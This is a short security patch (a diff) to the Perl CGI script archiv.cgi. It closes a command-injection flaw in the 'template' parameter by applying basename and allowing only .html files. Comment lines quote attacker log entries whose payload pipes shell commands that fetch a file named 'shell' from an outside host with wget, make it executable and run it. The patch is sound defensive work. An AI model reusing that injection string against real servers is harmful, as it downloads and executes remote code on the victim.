--- archiv.cgi.vul      2008-01-24 02:49:40.000000000 +0100
+++ archiv.cgi  2008-01-24 02:55:10.000000000 +0100
@@ -41,6 +41,12 @@
 # 200.163.6.137 - - [13/Feb/2005:07:41:21 +0100] "GET /cgi-bin/archiv.cgi?list=&template=archivpp.|wget| HTTP/1.1" 200 88 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
 # 200.163.6.137 - - [13/Feb/2005:07:41:30 +0100] "GET /cgi-bin/archiv.cgi?list=&template=archivpp.|cd%20/tmp;wget%20www.sergiorica.hpgvip.com.br/shell; chmod%20777%20shell;./shell|HTTP/1.1" 200 36 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
   $FORM{'template'} =~ s/\|//g;
+  use File::Basename;
+  $FORM{'template'} = ($FORM{'template'}) ? basename($FORM{'template'}) : "";
+  if ($FORM{'template'} && $FORM{'template'} !~ /\.html$/) {
+       &error ("$TXT{'1501'}");
+       }
+
 #
 if (!$FORM{'template'}) { $FORM{'template'} = "archiv.html";} # default filename
 if (!$FORM{'link'})     { $FORM{'link'} = "<<<<";}            # default backlink Text